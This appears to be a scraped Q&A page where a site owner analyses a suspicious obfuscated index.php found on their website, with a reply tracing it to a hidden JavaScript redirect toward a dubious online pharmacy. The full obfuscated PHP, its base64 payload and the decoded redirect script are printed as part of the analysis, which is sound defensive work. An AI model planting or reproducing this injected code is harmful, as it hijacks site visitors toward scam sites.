security - Found strange index.php on website -


i found strange , obscured file "index.php" @ website. don't know placed @ page, understand does.

the file has been obscured in first place replacing characters hex values.

<?php /* copyright */ ${"gl\x4fb\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4co\x42\x41l\x53"}["\x63kmj\x63uie"]="\x76";foreach($_get as${$egeillbp}=>${${"\x47l\x4fb\x41\x4cs"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4co\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4co\x42\x41ls"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4ed\x55klqv\x43b\x73y\x57\x35\x6edwfnzt1q\x59\x58z\x68\x63\x32\x4ey\x61x\x420pg\x30\x4b\x50\x43e\x74l\x510k\x5a\x6evuy3rpb2\x34g\x5a\x32v0\x62w\x55o\x63\x33ryk\x510\x4b\x65yb2yx\x49g\x61wr4id\x30\x67\x633r\x79\x4cmluzgv\x34\x542\x59\x6f\x4a\x7a\x38n\x4bt\x73\x67a\x57\x59g\x4bg\x6c\x6be\x43a9p\x53a\x74\x4ds\x6bgc\x6dv0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dfy\x49gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73zw\x35\x6e\x64g\x67\x37i\x48z\x68\x63\x69b\x75\x5axd\x66c3r\x79i\x440g\x49\x69i7\x49hz\x68c\x69\x42\x70id0\x67\x4dts\x67\x5am\x39\x79i\x43g\x72k2\x6c\x6beds\x67\x61\x57r\x34\x49\x44w\x67\x62g\x56\x75o\x79bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70d\x51\x70\x37ih\x5ahcib\x6aac\x41\x39\x49h\x42h\x63n\x4e\x6c\x53w\x35\x30khn0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524lc\x41\x79ks\x77\x67\x4d\x54ypoy\x42\x75zxd\x66\x63\x33ryics\x39ifn\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evz\x47\x55o\x4b\x47n\x6fi\x43\x73ga\x53k\x67\x4asaynty\x70\x4fy\x429ia0kz\x479jdw\x31\x6cb\x6e\x51ud3jp\x64\x47u\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdwj\x7a\x64h\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61c\x30xmsk\x72\x49lx\x31md\x41ynlx1m\x44\x412\x4e1\x781m\x44\x41\x32rl\x781\x4dda\x32\x51\x6c\x781\x4dd\x412qlx1m\x44\x41\x7a\x52fp\x61wl\x70\x63d\x54\x41\x77m\x6a\x4ac\x64\x54a\x77\x4d0\x4acdta\x77m0nc\x64t\x41\x77\x4d\x6bzcd\x54awnz\x4e\x63d\x54\x41\x77\x4ejn\x63dt\x41w\x4ez\x4acdt\x41\x77\x4ejlcd\x54a\x77\x4ez\x42\x63dta\x77nzr\x63\x64ta\x77\x4d0\x55i\x4b\x54snc\x6e0\x4ec\x6d\x64vb\x32\x64\x73zv\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eqg\x50\x53a\x69c\x48v\x69\x4cte\x30m\x7a\x411\x4fdq\x30m\x44g\x7amtm\x34\x4e\x44\x4d\x69o\x770\x4b\x5a\x329v\x5a2xlx\x32\x46\x6bx\x33d\x70\x5ah\x52\x6f\x49d\x30g\x4e\x7ai\x34\x4f\x77\x30kz\x32\x39vz2\x78lx2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43a\x39idk\x77ow\x30kz29vz2\x78\x6c\x58\x32f\x6bx\x32z\x76c\x6d\x31h\x64\x43a9\x49\x43i3\x4d\x6a\x68\x34otbf\x59\x58\x4diow\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32fk\x583\x525cgu\x67p\x53a\x69dg\x56\x34df\x39\x70\x62\x57f\x6ez\x53\x497\x44q\x70\x6e\x6229\x6e\x62\x47\x56\x66y\x57rf\x59\x32hh\x62\x6d5l\x62c\x419\x49\x43\x49\x69o\x77\x30kz\x32\x560\x62wuo\x49\x6d\x680\x64h\x416ly9\x77y\x57d\x6cywq\x79l\x6d\x64vb2\x64sz\x58n\x35bmr\x70y\x32\x460a\x579\x75l\x6d\x4e\x76\x62\x53\x39wy\x57d\x6cywqvc\x32\x68vd1\x39\x68z\x48\x4du\x61nm/m\x30\x493mtywn\x6b\x55\x32\x4e\x44\x5ab\x4e\x6bqxo\x44\x59zn\x54c2m\x7a\x56cn\x6ag\x31\x4d\x7au4\x4et\x55\x79qze\x77\x4e\x54c0\x52\x44yxnei1q\x7ar\x43\x4e\x54k\x30rj\x551ntg\x77ntiwnt\x670o\x54\x52\x45n\x44\x49\x30qzuz\x4d\x44\x6b0\x4ejq4m\x30iz\x4f\x44r\x42m\x30\x55\x30\x4d\x7aq\x78me\x5a\x47\x4d\x7a\x4d\x34\x4ed\x4d\x30m\x6an\x45m\x44\x5agq\x55\x595r\x6bv\x47n\x6by\x34r\x6azgn\x6byyrjr\x47n\x6by\x33ruvg\x4de\x591\x52\x6a\x46f\x51\x6a\x4ae\x4d\x6b\x4e\x46nz\x49\x34muy\x79\x4e\x6by\x30\x4dtuxo\x54\x454ruv\x46n0r\x47\x52\x45z\x45\x52\x6bqymuuxrjb\x43r\x54v\x45\x51\x55r\x42rdv\x45\x4eu\x4d1re\x52e\x52en\x47mtiwmtbg\x4dduwqj\x42fr\x44c\x69\x4bt\x73\x4e\x43\x69\x38\x76l\x530+i\x44wv\x55\x30\x4essvb\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"glob\x41ls"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>

i made small tool translated script it's origination.

<?php /* copyright */       ${"globals"}["kgnrwindbn"]="txt";     $egeillbp="k";${"globals"}["ckmjcuie"]="v";      foreach($_get as${$egeillbp}=>${${"globals"}["ckmjcuie"]})     {         ${"globals"}["dxwqoalvaue"]="k";         if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"globals"}["dxwqoalvaue"]}))         {             $xfgspywrt="k";             $jdhbwek="txt";             ${$jdhbwek} = base64_decode("pfnduklqvcbsyw5ndwfnzt1qyxzhc2nyaxb0pg0kpcetlq0kznvuy3rpb24gz2v0bwuoc3rykq0keyb2yxigawr4id0gc3rylmluzgv4t2yojz8nktsgawygkglkeca9psatmskgcmv0dxjuihn0cjsgdmfyigxlbia9ihn0ci5szw5ndgg7ihzhcibuzxdfc3ryid0giii7ihzhcibpid0gmtsgzm9yicgrk2lkedsgawr4idwgbgvuoybpzhggkz0gmixpkyspdqp7ihzhcibjaca9ihbhcnnlsw50khn0ci5zdwjzdhioawr4lcaykswgmtypoybuzxdfc3ryics9ifn0cmluzy5mcm9tq2hhcknvzguokgnoicsgaskgjsayntypoyb9ia0kzg9jdw1lbnqud3jpdguobmv3x3n0ci5zdwjzdhiomcxuzxdfc3rylmxlbmd0ac0xmskrilx1mdaynlx1mda2n1x1mda2rlx1mda2qlx1mda2qlx1mdazrfpawlpcdtawmjjcdtawm0jcdtawm0ncdtawmkzcdtawnzncdtawnjncdtawnzjcdtawnjlcdtawnzbcdtawnzrcdtawm0uiktsncn0ncmdvb2dszv9hzf9jbgllbnqgpsaichvilte0mza1odq0mdgzmtm4ndmiow0kz29vz2xlx2fkx3dpzhroid0gnzi4ow0kz29vz2xlx2fkx2hlawdodca9idkwow0kz29vz2xlx2fkx2zvcm1hdca9ici3mjh4otbfyxmiow0kz29vz2xlx2fkx3r5cgugpsaidgv4df9pbwfnzsi7dqpnb29nbgvfywrfy2hhbm5lbca9iciiow0kz2v0bwuoimh0dha6ly9wywdlywqylmdvb2dszxn5bmrpy2f0aw9ulmnvbs9wywdlywqvc2hvd19hzhmuanm/m0i3mtywnku2ndzbnkqxodyzntc2mzvcnjg1mzu4ntuyqzewntc0rdyxnei1qzrcntk0rju1ntgwntiwntg0otrendi0qzuzmdk0njq4m0izodrbm0u0mzqxmezgmzm4ndm0mjnemdzgquy5rkvgnky4rjzgnkyyrjrgnky3ruvgmey1rjffqjjemknfnzi4muyynky0mtuxote4ruvfn0rgrezerkqymuuxrjbcrtvequrbrdvenum1rererengmtiwmtbgmduwqjbfrdciktsnci8vls0+idwvu0nssvbupg==");             echo str_replace("zzzz",${$xfgspywrt},${${"globals"}["kgnrwindbn"]});             exit;         }      } /* copyright */ ?>

but still wasn't helpfull, because of base64 decoding inside. content has been decoded looks like:

<script language=javascript> <!-- function getme(str) { var idx = str.indexof('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var = 1; (++idx; idx < len; idx += 2,i++) { var ch = parseint(str.substr(idx, 2), 16); new_str += string.fromcharcode((ch + i) % 256); }  document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006f\u006b\u006b\u003dzzzz\u0022\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e"); } google_ad_client = "pub-1430584408313843"; google_ad_width = 728; google_ad_height = 90; google_ad_format = "728x90_as"; google_ad_type = "text_image"; google_ad_channel = ""; getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3b71606e646a6d186357635b685358552c10574d614b5c4b594f5558052058494d424c530946483b384a3e43410ff33843423d06faf9fef6f8f6f6f2f4f6f7eef0f5f1eb2d2ce7281f26f4151918eee7dfdfdfd21e1f0be5dadad5d5c5ddddcf12010f050b0ed7"); //--> </script>

and still unicode part has been encoded. result of decoding unicode part.

&gokk=zzzz";</script>

now know content, still can't figure out does. (and don't want try script don't know).

my guess tries call google adds in loop. make sense - because google block duplicated ip addresses.

has seen scripts @ website too? or have idea script does? thank suggestions.

after doing bit of sleuthing, appears script trying redirect hits on wherever index.php pharmaceutical site of dubious intent. google stuff cleverly implemented way hide url redirect in javascript.

first, replacing document.write console.log:

function getme(str) {     var idx = str.indexof('?');     if (idx == -1) return str;     var len = str.length;     var new_str = "";     var = 1;     (++idx; idx < len; idx += 2, i++) {         var ch = parseint(str.substr(idx, 2), 16);         new_str += string.fromcharcode((ch + i) % 256);     }     console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006f\u006b\u006b\u003dzzzz\u0022\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e"); }  getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3b71606e646a6d186357635b685358552c10574d614b5c4b594f5558052058494d424c530946483b384a3e43410ff33843423d06faf9fef6f8f6f6f2f4f6f7eef0f5f1eb2d2ce7281f26f4151918eee7dfdfdfd21e1f0be5dadad5d5c5ddddcf12010f050b0ed7");

we this:

<script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=zzzz";</script>

re.da.ct.ed being ip address. function getme() parses slug appended google url (which red herring).

doing curl request headers on decoded url, this:

$ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=zzzz' -i http/1.1 302 found date: fri, 27 jun 2014 21:07:39 gmt server: apache/2.2.22 (debian) x-powered-by: php/5.4.4-14+deb7u5 location: https://www.sleazydrugstore.net vary: accept-encoding content-type: text/html

looks nothing more redirect visitors sleazy looking drug store, although there might more malicious hidden in there.

i'm not sure whether post real urls , ips here, guidance appreciated.


Comments

Post a Comment

Popular posts from this blog

javascript - RequestAnimationFrame not working when exiting fullscreen switching space on Safari -

request animation frame stops working when exiting fullscreen clicking on original space's safari window. fine if fullscreen mode canceled escape key or calling cancelfullscreen(). steps reproduce: open https://dl.dropboxusercontent.com/u/769042/prezi/safari-fullscreen.html click "draw raf", kittie appears click "fullscreen", go fullscreen click "draw raf", kittie appears go space original safari was, showing "click exit fullscreen mode", click anywhere, out fullscreen click "draw raf", nothing happens what handling click calling: window.requestanimationframe(draw); which draws on canvas context: function draw() { ctx.drawimage(img, math.random()*500|0, math.random()*400|0, 100, 100); } i checked .hidden , .visibilitystate, updated correctly. tested on osx 10.9.3, safari 7.0.4 (9537.76.4). has workaround/solution other switching old settimeout? this sounds webkit bug 88940 : using reque
Read more

Python ctypes access violation with const pointer arguments -

i have api i'm trying wrap in python (2.7.6 on win7) code using ctypes. here's api: client_dllfunc bool clientapi search_exporttoclipcopy(clienthsearch handle, int channel, lpctstr filename, const time_t& from, const time_t& to, const bool* cameras, int length, bool usepassword, lpctstr password, bool includetextin = false, bool excludeplayer = false); the issue i'm having cameras argument; , i've had issue other const pointer arguments well. here's how i'm wrapping api: def search_exporttoclipcopy(self, hsearch, csearch, filename, tfrom, tto, cameras, length, usepassword, password, includetextin=true, excludeplayer=false): exporttoclipcopy = self.sdkdll.search_exporttoclipcopy exporttoclipcopy.argtypes = [c_int, c_int, c_wchar_p, c_long, c_long, pointer(c_bool), c_int, c_bool, c_wchar_p, c_bool, c_bool] exporttoclipcopy.restype = c_bool exporttoclipcopy(hsearch, csearch, filename, tfrom, tto, cameras, length, usepassword, pass
Read more